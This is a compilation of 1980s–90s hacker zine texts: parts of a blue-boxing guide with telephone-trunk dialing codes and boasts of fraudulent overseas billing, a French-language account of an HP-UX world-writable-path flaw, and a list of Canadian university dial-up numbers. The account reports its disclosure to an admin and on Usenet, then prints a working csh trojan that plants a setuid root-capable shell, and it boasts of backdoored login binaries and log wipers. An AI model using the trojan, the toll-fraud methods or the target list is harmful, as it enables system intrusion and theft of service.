1. Routing information. In the above example, when the 303 operator
needed to dial an inward that served 215-647, she needed to know
if any special routing was required and, if so, what it was.
Assuming she would use rate and route, she would dial them and say
nicely, "Operator's route, please, for 215-647." Rate & route
would respond with "215 plus." This means that the operator would
dial KP+215+121+ST to reach the inward that serves 215-647. If
there were special routing required, such as in 312-456, rate &
route would respond with "312 plus 032 plus." In that case, the
operator would dial KP+312+032+ST for the inward that serves
312-456.

It is good practice to ask for "operator's route" specifically,
as there are also "numbers route" and "directory routes." If you
do not specifically ask for operator's route, rate & route will
generally assume that is what you want anyway.

"Numbers" route refers to overseas calls. Example, you want to
know how to reach a number in Geneva, Switzerland (and you already
have the number). You would call routing and say "Numbers route,
please, Geneva, Switzerland." The operator would respond with:

"Mark 41+22. 011+041+ST (plus) 041+22"

The "Mark 41+22" has to do with billing, so disregard it. The 011+
041 is access to the overseas gateway (to be discussed in Part
III) and the 041+22+ is the routing for Geneva from the overseas
sender.

"Directory" routings are for directory assistance overseas.
Example: you want a DA in Rome, Italy. You would call rate & route
and say, "Directory routing please, for Rome, Italy." They would
respond with "011+039+ST (plus) 039+1108 STart." As in the
previous example, the 011+039 is access to the overseas gateway.
The 039+1108 is a directory assistant in Rome.

2. Nameplace information. Rate & Route will give you the location
of an NPA+exchange. Example: "Nameplace please, for 215-647." The
operator would respond with "Paoli, Pennsylvania." This isn't
especially useful, since you can get the same information
(legally) by dialing 0, but using rate & route is often much
faster and it avoids having to hang up when you are already on a
trunk.

*NOTE on Rate & Route: As a blue boxer, always ask for "IOTC"
routings. (e.g., "IOTC operator's route", "IOTC numbers route",
etc.) This tells them that you want cordboard-type routings, not
TSPS, because a blue boxer is actually just a cordboard position
(that Bell doesn't know about).

OVERSEAS COMPLETION OPERATOR (inbound)- These operators (KP+151+ST)
assist in the completion of calls coming in to the United States
from overseas. There are KP+151+ST operators only in a few NPAs in
the country (namely 303). To use one, you would seize a trunk and
dial KP+303+151+ST. Then you would tell the operator, for example,
"This is Bangladesh calling. I need U. S. number 215-561-0562
please." [in a broken Indian accent]. She would connect you, and
the bill would be sent to Bangladesh (where I've been billing my
KP+151+ST calls for two years).

Other internal Bell Operators.

KP+11501+ST - Universal operator
KP+11511+ST - Conference operator
KP+11521+ST - Mobile operator
KP+11531+ST - Marine operator
KP+11541+ST - Long distance terminal
KP+11551+ST - Time & charges operator
KP+11561+ST - Hotel/motel operator
KP+11571+ST - Overseas (outbound) operator

These 115X1 operators are identical in routing to the 1X1
operators listed previously, with one exception. If special routing
is required (0XX), then the trailing 1 is left off.

Examples:

A 312 universal operator: KP+312+11501+ST

A Franklin Park (312-456) universal operator (special routing 032
required) KP+312+032+1150+ST [The trailing 1 of 11501 is left off].

Purposes of 115X1 operators.

UNIVERSAL- Used for collect/call back calls to coin stations.

CONFERENCE- This is a cordboard conference operator who will set up
a conference for a customer on a manual operation basis.

MOBILE- Assists in completion of calls to mobile (IMTS) type phones

MARINE- Assists in completion of calls to ocean going vessels.

LONG DISTANCE TERMINAL- Now obsolete. Was used for completion of
long distance calls.

TIME & CHARGES- Will give exact costs of calls. Used to time calls
and inform customer of exactly how much it cost.

HOTEL/MOTEL- Handles calls to/from hotels and motels.

OVERSEAS COMPLETION (outbound)- Assists in completion of calls to
overseas points. Only works in some, if any NPAs, because overseas
assistance has been centralized to IOCC (covered in Part III).

Note that all KP+1X1+ST and KP+115X1+ST operators automatically
assume that you are a TSPS or cordboard operator assisting a
customer with a call. DO NOT DO ANYTHING TO JEOPARDIZE THIS! If you
do not know what to do, don't call these operators! Find out what
to do first.

This concludes Part II. There is one final part in which I will
explain overseas dialing, IOCC (International Overseas Completion
Centre), RQS (Rate/Quote System), and some basic scanning.

...................................................................
(c) February 6, 1985 Mark Tabas
...................................................................
LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD




The Mark Tabas encounter
series presents:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part III
Advanced Signaling
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(It is assumed that the reader has read and understood parts I & II
before proceeding to this part).

In parts I & II, I covered basic theory and domestic singling
and operators. In this part I will explain overseas direct boxing,
the IOCC, the RQS, and some basic scanning methods.

Overseas Direct Boxing.

Calling outside of the United States and Canada is accomplished
by using an "overseas gateway." There are 7 overseas gateways in
the Bell System, and each one is designated to serve a certain
region of the world. To initiate an overseas call, one must first
access the gateway that the call is to be sent on. To do this auto-
matically, decide which country you are calling and find its
country code. Then, pad it to the left with zeros as required so
it is three digits. [Add 0, 1, or 2 zeros as required].

Examples:

Luxembourg (352)..... 352 (stays the same)
Spain (34)........... 034 (1 zero added)
U.S.S.R. (7)......... 007 (2 zeros added)

Next, seize a trunk and dial KP+011+CC+ST. Note that CC is the
three digit padded country code that you just determined by the
above method. [For Luxembourg, dial KP+011+352+ST, Spain KP+011+034
+ST, and the U.S.S.R. KP+011+007+ST]. This is done to route you to
the appropriate overseas gateway that handles the country you are
dialing. Even though every gateway will allow you to dial every
dialable country, it is good practice to use the gateway that is
designated for the country you are calling.

After dialing KP+011+CC+ST (as CC is defined above) you should be
connected to an overseas gateway. It will acknowledge by sending a
wink, which is audible as a <beep><kerchunk> and a dial tone. Once
you receive international dial tone, you may route your call one of
two ways: A) as an operator-originated call, or B) as a customer-
originated call. To go as a customer-originated call, key KP+
country code (NOT padded with zeros)+city code+number+ST. You will
then be connected, providing the country you are calling can
receive direct-dialed calls. The U.S.S.R. is an example of a
country that cannot.

Example of a boxed int'l call:

To make a call to the Pope (Rome, Italy), first obtain the country
code, which is 39. Pad it with zeros so that it is 039. Seize a
trunk and dial KP+011+039+ST. Wait for sender dial tone and then
dial KP+39+6+6982+ST. 39 is the country code, 6 is the city code,
and 6982 is the Pope's number in Rome. To go as an operator-
originated call, simply place a zero in front of the country code
when dialing on the gateway. Thus, KP+0+39+6+6982+ST would
be dialed at sender dial tone. Routing your call as operator-
originated does not affect much unless you are dialing an operator
in a foreign country.

To dial an operator in a foreign country, you must first obtain
the operator routing from rate & route for that country. Dial rate
& route and if you're trying to get an operator in Yugoslavia, say
nicely, "IOTC Operator's route, please, for Yugoslavia." [In larger
countries it may be necessary to specify a city]. Rate & route will
respond with, "38 plus 11029". So, dial your overseas gateway,
KP+011+038+ST, wait for sender dial tone, and key KP+0+38+11029+ST.
You should then get an operator in Yugoslavia. Note that you must
prefix the country code on the sender with a 0 because presumably
only an operator here can dial an operator in a foreign country.

When you dial KP+011+CC+ST for an overseas gateway, it is
translated to a 3-digit sender code of the format 18X, depending on
which sender is designated to handle the country you are dialing.
The overseas gateways and their 3-digit codes are listed below.

182 - White Plains, NY
183 - New York, NY
184 - Pittsburgh, PA
185 - Orlando, FL
186 - Oakland, CA
187 - Denver, CO
188 - New York, NY

Dialing KP+182+ST would get you the sender in White Plains, and
KP+183+ST would get the sender in NYC, etc., but the KP+011+CC+ST
is highly suggested (as previously mentioned). To find out what
sender you were routed to after dialing KP+011+CC+ST, dial (at
int'l dial tone): KP+0000000+ST.

If you have difficulty in reaching a sender, call rate and route
and ask for a numbers route for the country you're dialing.
Sometimes, KP+011+padded country code+ST will not work. I have
found this in many 3-digit country codes. Luxembourg, country code
352, for example, should be KP+011+352+ST theoretically. But it is
not. In this case, dial KP+011+003+ST for the overseas gateway. If
you have trouble, try dialing KP+011+first digit of country code+
ST, or call rate and route.

The IOCC

Sometimes when you call rate and route and ask for an "IOTC
numbers route" or "IOTC operators route" for a foreign country, you
will get something like "160+700" (as in the case of the Soviet
Union). This means that the country is not dialable directly and
must be handled through the International Overseas Completion
Centre (IOCC). For an IOCC routing, pad the country code to the
RIGHT with zeros until it is 3 digits. Then KP+160 is dialed, plus
the padded country code, plus ST.

Examples:

The U.S.S.R. (7) ...... KP+160+700+ST
Japan (81) ............ KP+160+810+ST
Uruguay (598) ......... KP+160+598+ST

You will then be routed to the IOCC in Pittsburgh, PA, who will
ask for country, city, and number being dialed. Many times they
will ask for a ring back [thanks to Telenet Bob] so have a loop
ready. They will then place the call and call you back (or
sometimes put you through directly). Some calls, such as to Moscow,
take several hours.

The Rate Quote System (RQS).

The RQS is the operator's rate/quote system. It is a computer
used by TSPS (0+) operators to get rate and route information with-
out having to dial the rate and route operator. In Part II, I
discussed getting an inward routing for dialing-assistance and
emergency interrupts from the rate and route operators (KP+800+141+
1212+ST). The same information is available from RQS. Say you want
the inward routing for 305-994. You would seize a trunk and dial
KP+009+ST (to access the RQS). Sometimes, if you seize a trunk in
an NPA not equipped with RQS, you need to dial an NPA that is
equipped with RQS first, such as 303. Anyway, after you dial KP+
009+ST or KP+303+009+ST, you will receive a wink (<beep><kerchunk>)
and then RQS dial tone. At RQS dial tone, for an inward routing for
305-994 you would dial KP+06+305+994+ST. That is, KP+06+NPA+
exchange+ST. RQS will respond with "305 plus 033 plus". This means
you would dial KP+305+033+121+ST for an inward that services
305-994. If no special routing were required, RQS would have
responded with "305 plus" and you would simply dial:

KP+305+121+ST for an inward.

Another RQS feature is the echo feature. You can use it to test
your blue box. Dial RQS (KP+009+ST) and then key KP+07+1234567890+
ST. RQS will respond with voice identification of the digits it
recognized, between the KP+07 and ST.

RQS can also be used for rates and directory routings, but those
are seldom needed, so they have been omitted here.

Simple Scanning.

If you're interested in scanning, try dialing on a trunk,
routings in the format of KP+11XX1+ST. Begin with 11001 and scan
to 11991. There are lots of interesting things to be found there,
as Doctor Who (413 area) can tell you. Those 11XX1 routings can
also be prefixed with an NPA, so if you want to scan area code 212,
dial KP+212+11XX1+ST.

There, now you know as much about blue boxing as most phreaks. If
you read and understand the material, and put aside preconceived
ideas of what blue boxing is that you may have acquired from
inexperienced people or other bulletin boards, you should be well
on your way to an enlightening career in blue boxing. If you follow
the guidelines in Part I to box, you should have no problem with
the fone company. Comments made by "phreaks" on bulletin boards
that proclaim "tracing" of blue boxers are nonsense and should be
ignored (except for a passing chuckle).

NOTE 1: CCIS and the downfall of blue boxing.

CCIS stands for Common Channel Interoffice Signaling. It is a
signaling method used between electronic switching systems that
eliminates the use of 2600Hz and 3700Hz supervisory signals, and
MF pulsing. This is why many places cannot be boxed off of; they
employ CCIS, or out-of-band signaling, which will not respond to
any tones that you generate on the line. Eventually, all existing
toll equipment will be upgraded or replaced with CCIS or T-carrier.
In this case, we'll all be boxing with microwave dishes. Until
then (about 1995 by current BOC/AT&T estimates), have fun!

If you have ANY questions about this text, please feel free to drop
me a line. I will respond to all mail, messages, etc. Insults are
also welcomed. And if you discover anything interesting scanning,
be sure to let me know.

Mark Tabas
$LOD$

This text was prepared in full by Mark Tabas for:

K.A.O.S.
Philadelphia, PA.
[215-465-3593]

Any sysop may freely download this text and use it on his/her BBS,
provided that none of it be altered in any way.

Technical acknowledgments:

Karl Marx, X-Man, High-Rise Joe, Telenet Bob, Lex Luthor, TUC, John
Doe, Doctor Who (413 area), The Tone Sweep, Mr. Silicon, K00L KAT,
The Glump.

References:

1) Notes on the BOC Intra-LATA Networks
Bell System publication, 1983.
2) Notes on the Network
Bell System publication, 1983.
3) Engineering and Operations in the Bell System
Bell System publication, 1983.
4) Notes on Distance Dialing
Bell System publication, 1968.
5) Early Medieval Architecture.
Warren & Cathy Bill, Houghton Publishing Co., 1979.
...................................................................
(c) February 6, 1985 Mark Tabas
...................................................................
LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

To root or not to root, that is the question!
ou
Hewlett Packard UX system V ou Hack/Phreak UX?
par:
Gurney Halleck

Voici ce que j'ai d‚couvert, par pur hazard sur un systŠme …
l'Universit‚ Laval (*.gmc.ulaval.ca). Tous les hosts qui runnent HP/UX v9.x
‚taient affect‚s par ce problŠme, sans exception! Le problŠme en question?
Un directory dans le path par default ‚tait world writable!!! Oui vous
avez bien compris, /usr/local/bin ‚tait -rwxrwxrwx. Pour ˆtre plus pr‚cis,
/usr/local/* au complet ‚tait -rwxrwxrwx !!! Bon, ma premiŠre r‚action
fut: c'est un piŠge!!! (la paranoia n'a pas de limite), puis j'ai commenc‚
… imaginer des fa‡ons d'exploiter cette "feature" de HP/UX. Ma premiŠre
id‚e fut de cr‚er des trojans portant les noms de commandes fr‚quemment
utilis‚es mais avec de petite faute de frappe (ex: mroe au lieu de more). Cette
exemple ne s'appliquait pas dans mon cas car mroe ‚tait d‚j… alias‚ … more...
Mais vous comprenez l'id‚e. Bon, je r‚fl‚chis, root utulise principalement
la machine Levesque. Je me rlogin et cd a /usr/local/bin... et j'admire le
tout. Je d‚marre donc l'‚diteur et je commence a ‚crire un trojan...

Bon, finalement je ne l'installe jamais sur le systŠme, pour de trŠs
bonne raison:

1. Je suis un usager authoris‚ de ce systeme et ce systeme appartient a mon
d‚partement … l'Universit‚.
2. Je suis relativement bien connue a l'Universit‚.

Donc je d‚cide de laisser faire, sachant trŠs bien que j'aurais r‚ussi …
pogner root apres quelque jours... c'est pas aussi satisfaisant que de
l'avoir pour vrai, mais dans ce cas ci ca devait me contenter... Je d‚cide
donc d'avertir l'admin du systŠme pour qu'il r‚pare tout ca, ‚liminant ainsi
la tentation (la chair est faible :-) Voici une copie du mail au sysadmin:

From: XXXXX@gmc.ulaval.ca
Received: from beaujeu.gmc.ulaval.ca by usenet.elf.com with SMTP id AA03603
(5.67a/IDA-1.5 for <npc@sietch.ci.net>); Wed, 23 Feb 1994 22:20:16 -0500
Message-Id: <199402240320.AA03603@usenet.elf.com>
Received: by beaujeu.gmc.ulaval.ca
(1.37.109.4/16.2) id AA04248; Wed, 23 Feb 94 21:17:35 -0600
Subject: probleme serieux de securite sur HP/UX
To: root@beaujeu.gmc.ulaval.ca, pgaumond@beaujeu.gmc.ulaval.ca
Date: Wed, 23 Feb 94 21:17:34 CST
Cc: npc@sietch.ci.net, XXXXXX@beaujeu.gmc.ulaval.ca
Action: Read this pronto
Priority: High
Reply-To: XXXXXX@gmc.ulaval.ca
X-Security-Warning: unauthozided users may gain root priviledges
Mailer: Elm [revision: 70.85]

Bonjour Pierre,

Nous sommes Mercredi soir, j'ai decouvert durant la journee un
probleme de securite que je considere tres serieux. Apres mure reflection,

[en realite, je connaissais le probleme depuis 48 heures]

j'ai decide de t'en faire part. Peur initial, etre retenue responsable pour
le probleme. C'est donc pour ca le cc. J'assure mes arrieres, c'est pas tout
les jours que je joue le bon sammaritain et je ne voudrais pas etre echaude.
J'irai demain (jeudi) te faire part de tout cela en personne. Je ne voudrais
rien divulger par E-Mail (cc) :-) J'ai tout de meme hate de te rencontrer et
qu'on parle Unix et securite ensemble, face a face.

Veuillez agreer, Monsieur, l'expression de mes sentiments les
meilleurs.



P.S. J'espere que HP/UX est shippe comme ca, car si c'est toi qui a fait ca,
c'est pas fort...

[Finallement, c'est HP/UX qui est shipper comme ca... HP, l'ami de la scene
H/P :-) ]

--
XXXXXXXXXXXXXXX | Space reserved for office use only | Big Unix fan here !
Etudiant en Genie Mecanique | don't drink and root! | I am so 3l33+ !@#!
"The Blue Box, is callin' us..." -- Jim Morrison


Donc le lendemain je me rend a son bureau, il patche machinalement le hpterm
selon l'advisory de Hewlett Packard #4 (je crois). Je lui montre donc le
problŠme. Sa premiere r‚action fut l'incomprehension du probleme: "Quoi, le
directory est vide, o— est le probleme?" Apres que je lui explique il compris
le problŠme et promis de le r‚parer, ce qu'il a fait dans la journ‚e mˆme. Il
m'a mˆme remercier :-) Bon, je ne peux pas vraiment retenir contre lui le
fait qu'il n'a pas catcher le problŠme sur le champs, pour un admin qui ne
cherche pas … pogner root, j'avoue que ‡a ne saute pas aux yeux. Mais pour
un hacker c'est l'‚vidence mˆme. Apres je lui dit donc: "Tu patches le
hpterm?". D'un air surpris il r‚pond oui. On commmence … parler s‚curite un
peu. Il est sous l'impression que HP/UX a moins de bugs que SunOS. Je ne
partage pas n‚cessairement son opinion, c'est juste que HP est moins "vocale"
a propos des problŠmes de s‚curit‚. Prenons comme exemples hpterm, le bug
‚tait connu des hackers depuis un m‚chant bout de temps et de HP aussi avant
qu'il l'admette. Bof, divergences d'opinions, ‡a rend les choses plus
int‚ressante. Ensuite je lui fait part du trouble que j'ai eu a me retenir
d'utiliser cette "feature". C'est la que ‡a ce gate! Il m'a repondu: "C'‚tait
mieux pour toi." !!!! C'‚tait mieux pour MOI! Comme s'il s'en serait rendu
compte! Laisse moi te dire dŠs maintenant, que si j'avais utilis‚ cette
"feature" et que j'aurais pogn‚ root (et je l'aurais pogn‚!) tu ne l'aurais
jamais su. J'ai des versions patches de login et in.telnetd avec de belles
backdoors dedans, j'ai des utilitaires pour enlever mes traces des wtmp,
utmp, pacct, ps et netstat, seul ton tcp-wrapper aurais pu te donner un
indice de ma pr‚sence, mais la, meme tes arriere-petit enfants n'aurais pas
pu me mettre dehors de ce systeme! Bon Bon, disons que j'esperais d‚masquer
en lui un ancient hacker. J'imaginais qu'on aurait parler hacking ensemble,
partager d'ancienne histoire de "guerre" ... Je m'‚tais tromp‚e. C'‚tait ma
premiŠre exp‚rience de bon samaritain, c'est pas aussi le fun que ‡a parait
finalement...

Pendant ce temps, je post sur usenet dans comp.security.unix et
comp.sys.hp.hpux et je fais part du problŠme … la communaut‚ mondiale.
Voici mon post:


Path: sietch!ghalleck
From: ghalleck@sietch.ci.net (Gurney Halleck)
Newsgroups: comp.sys.hp.hpux,comp.security.unix
Subject: Re: Holes in HP-UX 9.0?
Message-ID: <LNiBic5w165w@sietch.ci.net>
Date: Fri, 25 Feb 94 14:29:20 EST
References: <2kj54p$iel@panix2.panix.com>
Organization: Arrakis Communications Int'l

stehman@panix.com (Jeff Stehman) writes:

> In <2ki80s$dob@hq.hq.af.mil> jbowyer@selma.hq.af.mil writes:
>
> >I'm looking for some information on what should be patched/
> >fixed on a HP-UX V9.0...so far they are aware of a DUI problem,
> >a linking/unlinking problem, and some aggravation with setgid and
> >setuid.
>
> Do you consider several hundred world-writable files a security hole?
> I keep meaning to ask HP via the support BBS what files *need* to be
> world-writable. (If anyone happens to have a list, please send/post.)
> "find / -perm -002 -print" will give you a list of world-writable files.
>
> (Hm.. I seem to recall that /usr/local subdirectories are world-writable,
> and that /usr/local/bin is in root's path. Don't recall if that is a
> default or a local change I stumbled upon during an audit, though.)

I found that to on the system I use a my university, I mailed to admin
about a security problem and I went to show him. I said got to the
/usr/local/bin directory and look. His answer was: "What's the problem,
it's empty" I think it is a magor risk to have a world writable directory
in root's path. A small typo and bam! the hacker has root! Good thing I
had sworn to myself to be good the system, cause I could have had cause
alot of trouble if I had wanted...

>
> You might want to enable the sticky bit on the various tmp directories,
> too.
>
> HP has sent out security bulletons regarding sendmail, hpterm/xterm, a
> setuid root-owned script, and... sorry, don't recall the others right
> off hand. HP support should be able to help you out with patching the
> stuff in their bulletons.
>
> --
> Jeff Stehman


Gurney Halleck

ghalleck@Sietch.ci.NET | We are Microsoft. Unix is irrelevant. Openness
Gurney Halleck [4i8] | is futile. Prepare to be assimilated.
[NPC] | -Bill Gates


Voila, j'averti la communaut‚ du problŠme, j'ai re‡u 2 r‚ponses , voici
donc la premiŠre, qui est favorable:

Path:
sietch!ci-pioneer!usenet.elf.com!noc.near.net!MathWorks.Com!europa.eng.gtefsd.c
om!howland.reston.ans.net!cs.utexas.edu!uunet!portal!karl
From: karl@shell.portal.com (Karl Paul Mueller)
Newsgroups: comp.sys.hp.hpux,comp.security.unix
Subject: Re: Holes in HP-UX 9.0?
Message-ID: <CLuL9E.1to@unix.portal.com>
Date: Sat, 26 Feb 1994 20:08:00 GMT
References: <2kj54p$iel@panix2.panix.com> <LNiBic5w165w@sietch.ci.net>
Sender: news@unix.portal.com
Organization: Portal Communications Company
Lines: 25
Nntp-Posting-Host: jobe.shell.portal.com

ghalleck@sietch.ci.net (Gurney Halleck) writes:

>I found that to on the system I use a my university, I mailed to admin
>about a security problem and I went to show him. I said got to the
>/usr/local/bin directory and look. His answer was: "What's the problem,
>it's empty" I think it is a magor risk to have a world writable directory
>in root's path. A small typo and bam! the hacker has root! Good thing I
>had sworn to myself to be good the system, cause I could have had cause
>alot of trouble if I had wanted...

Yet another example of admins who don't understand their system.
Of course, it wasn't his fault... But something should have
clicked in his mind when you said thet /usr/local is world writeable.
Does anybody have a list of have-to-be world-writeable files?

>Gurney Halleck

> ghalleck@Sietch.ci.NET | We are Microsoft. Unix is irrelevant. Openness
> Gurney Halleck [4i8] | is futile. Prepare to be assimilated.
> [NPC] | -Bill Gates

Haha.. good .sig.. and it's short too :-)

Karl Mueller
karl@shell.portal.com


Bon, il confirme le problŠme et le ton est g‚n‚ralement gentil. Il appr‚cie
ma .sig, du Usenet … son meilleur... Je reprends confiance... jusqu'au post
qui suit:


Path:
sietch!ci-pioneer!usenet.elf.com!rpi!gatech!europa.eng.gtefsd.com!howland.resto
n.ans.net!EU.net!Germany.EU.net!netmbx.de!zrz.TU-Berlin.DE!zib-berlin.de!news.t
h-darmstadt.de!fauern!winx03!rzuw039
From: rzuw039@rz.uni-wuerzburg.de (Juergen Weinelt)
Newsgroups: comp.sys.hp.hpux,comp.security.unix
Subject: Re: Holes in HP-UX 9.0?
Message-ID: <2kt0ap$6ev@winx03.informatik.uni-wuerzburg.de>
Date: 28 Feb 1994 14:50:01 GMT
References: <2kj54p$iel@panix2.panix.com> <LNiBic5w165w@sietch.ci.net>
Followup-To: comp.sys.hp.hpux,comp.security.unix
Organization: University of Wuerzburg, Germany
Lines: 15
NNTP-Posting-Host: wrzx28
X-Newsreader: TIN [version 1.2 PL2]

In article <LNiBic5w165w@sietch.ci.net> (Fri, 25 Feb 94 14:29:20 EST)
Gurney Halleck (ghalleck@sietch.ci.net) wrote:
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

> Good thing I
> had sworn to myself to be good the system, cause I could have had cause
> alot of trouble if I had wanted...

Well, if you're such a good guy(TM), why don't you use your
real name? Using pseudonyms is, uh, frowned upon on Usenet,
isn't it?

-- Juergen Weinelt

jow@rz.uni-wuerzburg.de *** jow@hcast.adsp.sub.org *** jow@hcast.franken.de


Non, mais pour qui il se prend celui l…? J'ai parfaitement le droit a
l'anonymit‚e si je veux non? Je me fƒche donc et je r‚plique:


Path: sietch!ghalleck
From: ghalleck@sietch.ci.net (Gurney Halleck)
Newsgroups: comp.sys.hp.hpux,comp.security.unix
Subject: Re: Holes in HP-UX 9.0?
Message-ID: <XNTHic1w165w@sietch.ci.net>
Date: Tue, 01 Mar 94 00:12:44 EST
References: <2kt0ap$6ev@winx03.informatik.uni-wuerzburg.de>
Organization: Arrakis Communications Int'l

rzuw039@rz.uni-wuerzburg.de (Juergen Weinelt) writes:

> In article <LNiBic5w165w@sietch.ci.net> (Fri, 25 Feb 94 14:29:20 EST)
> Gurney Halleck (ghalleck@sietch.ci.net) wrote:
> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>
> > Good thing I
> > had sworn to myself to be good the system, cause I could have had cause
> > alot of trouble if I had wanted...
>
> Well, if you're such a good guy(TM), why don't you use your
> real name? Using pseudonyms is, uh, frowned upon on Usenet,
> isn't it?
>
> -- Juergen Weinelt


I am so wicked aren't I? Will you come over and spank me for using a
pseudomyn? Well excuse me for pointing out security weaknesses and being
temped to use them (which I did not do). Next time, I guess I'll keep my
big mouth shut! BTW, to post with my real name, I would have to FAKE a
posting to change the ghalleck, and that is frowned upon on Usenet. I am
sorry if I upsetted you, your holiness, you must have been raised on
FidoNET or something...

Gurney Halleck

ghalleck@Sietch.ci.NET | We are Microsoft. Unix is irrelevant. Openness
Gurney Halleck [4i8] | is futile. Prepare to be assimilated.
[NPC] | -Bill Gates

Bon, j'y ai pas ‚t‚ avec le dos de la cuillŠre, la r‚f‚rence … FidoNET est
particuliŠrement m‚chante :-) Mais il faut dire qu'il m'a cherch‚ le con.
Donc, r‚capitulation: la r‚ponse du c“t‚ des gentils n'est pas fracassante,
meme pas inter‚ssantes, un admin qui me dit merci, un gars qui trouve que
ma .sig est dr“le et un asshole qui me tombe dessus pour avoir utilis‚ un
pseudonyme. Bon, c'est officiel, c'‚tait la premiŠre et derniŠre fois que je
jouais les bons samaritains. Les admins n'ont qu'… bien se tenir!!

Pour ce qui est de la communaute H/P (Hack/Phreak, pas Hewlett Packard :-)
Un ami (Pluvius) aprŠs avoir lu mon post sur comp.security.unix a d‚j… cr‚er
un script qui exploite cette faiblesse de s‚curit‚ de HP/UX. Au moins cette
communaut‚ m'appr‚cie. [Atreid- Sniff... Gurney l'incompri... Pauvre de toi,
pardonne-leur, parce qu'ils ne savent pas ce qu'ils font!] Voici je l'inclue
pour tous les jeunes qui ont accŠs des machines HP/UX, fini les folies de
Gurney Halleck, gentil utulisateur.

Sans plus tarder, voici la contribution de Pluvius … la communaut‚ H/P:

Pluvius saiz:

HP-UX contains a vulnerability in that it is shipped with /usr/local/bin world
writable and included in users paths.
By creating executables with names of commonly mis-spelled commands that are
trojan horse programs, a setuid shell can be created, and left in the
directory. The following script exploits (??? well, takes advantage of) this
vulnerability.
--- CLIP CLIP CLIP ---
#!/bin/csh
# This little script file, if named properly and left in the
# /usr/local/bin directory acts as a pseudo trojan horse on
# HP-UX systems with world writable /usr/local/bin directories,
# and /usr/local/bin in all users paths. This is the default shipping
# on all recent HP-UX versions (well, on the vanila A.09.04
# it is world writable, which is brand new).
# This script provided for informational purposes, and will create the
# file shell.<user> when run.
#
# Suggested links (this is in /usr/local/bin):
#lrwxr-x--- 1 bin bin 2 Feb 28 13:55 dir -> sl
#lrwxr-x--- 1 bin bin 2 Feb 28 13:33 la -> sl
#lrwxr-x--- 1 bin bin 2 Feb 28 13:33 ls- -> sl
#lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-al -> sl
#lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-l -> sl
#lrwxr-x--- 1 bin bin 2 Feb 28 13:29 ls-la -> sl
#lrwxr-x--- 1 bin bin 2 Feb 28 13:28 setenv -> sl
#-rwxrwxrwx 1 bin bin 796 Feb 28 14:00 sl
#
# note: create this file (sl in above example), then create all the links
# you want with - "ln -s sl dir", then "chgrp bin dir" and "chown bin dir"
# and just wait for some unsuspecting user to run the program by mistake.

cat > /usr/local/bin/bug.c << EOF
main(argc,argv) int argc; char *argv[]; { execv("/bin/sh",argv); }
EOF
cc -o /usr/local/bin/shell.`whoami` /usr/local/bin/bug.c
rm -f /usr/local/bin/bug.c
chmod 5777 /usr/local/bin/shell.`whoami`
echo $0 | awk '{ split($0,cmd,"/"); print cmd[5], ": Command not found." }' -
--- CLIP CLIP CLIP ---

(yeah, i was bored today, and you bitches never post any fucking messages,
so I wrote some eleet scripts...)
-pluv


Alors, c'est tout pour ce mois ci, et moi qui avait dit que je n'aurais pas
le temps de fournir un article pour le NPC de ce mois-ci.


-----------------------------------------------------------------

úAú úPúRúEúVúIúOúUúSúLúYú úUúNúKúNúOúWúNú úLúIúFúEúSúTúYúLúEú

-----------------------------------------------------------------

> Listing of Canadian Universities Dialups
> Compiled by Subhuman Punisher <subhuman@sietch.ci.net>


University of Manitoba [Winnipeg, MB] 204-275-6100 [2400]
204-275-6132 [V32b]
204-275-6150 [V32b]
University of Regina [Regina, SK] 306-586-5550 [2400]
University of Saskatchewan [Saskatoon, SK] 306-933-9400 [V32b]
University Of Alberta [Edmonton, AB] 403-492-0024 [2400]
403-492-0096 [V32]
403-492-3214 [V32b]
University of Toronto [Toronto, ON] 416-978-3959 [1200]
416-978-8171 [2400]
Universit‚ du Qu‚bec … Chicoutimi [Chicoutimi, PQ] 418-545-6010 [V32b]
Universite Laval [Quebec, PQ] 418-656-7700 [2400]
418-656-3131 [HST-V32b]
418-656-5523 [V32b]
University of New Brunswick [Fredericton, NB] 506-453-4551 [HST-V32b]
506-453-4560 [HST-V32b]
506-453-4609 [HST-V32b]
506-452-6393 [HST-V32b]
Universite du Quebec a Montreal [Montreal, PQ] 514-285-6401 [V32b]
514-845-8175 [V32b]
Ecole Polytechnique [Montreal, PQ] 514-340-4449 [2400]
514-340-4951 [?]
514-343-2411 [?]
McGill University [Montreal, PQ] 514-398-8111 [2400]
514-398-8211 [2400]
514-398-8711 [V32]
Universite de Montreal [Montreal, PQ] 514-733-2394 [2400]
514-343-2411 [V32b]
514-343-7835 [?]
514-733-1271 [?]
514-733-0832 [?]
Concordia University [Montreal, PQ] 514-848-8800 [?]
514-848-7494 [?]
514-848-8828 [?]
514-848-4585 [V32]
514-848-8834 [?]
514-848-7370 [?]
University of Western Ontario [London, On] 519-661-3511 [2400]
519-661-3512 [V32]
519-661-3513 [V32b]
Windsor University [Windsor, ON] 519-252-1101 [2400]
University of Waterloo [Kitchener, ON] 519-725-5100 [V32b]
519-725-1392 [2400]
Simon Fraser University [Vancouver, BC] 604-291-4700 [1200]
604-291-4721 [2400]
604-291-5947 [V32]
University of Victoria [Victoria, BC] 604-721-2839 [V32]
604-721-6148 [V32]
University of British Columbia [Vancouver, BC] 604-822-9600 [V32b]
Carleton University [Ottawa, ON] 613-788-3900 [V32]
613-564-5600 [2400]
Queen's University [Kingston, ON] 613-548-8258 [V32]
613-545-0383 [V32b]
University of Ottawa [Ottawa, ON] 613-564-3225 [V32b]
613-564-5926 [V32]
York University [Ottawa, ON] 613-230-1439 [V32]
Trent University [Peterborough, ON] 705-741-3350 [V32b]
705-741-3351 [V32b]
705-741-4637 [V32b]
Memorial Univ. of Newfoundland [St-John's, NF] 709-737-8302 [2400]
Lakehead University [Thunder Bay, ON] 807-346-7770 [V32b]
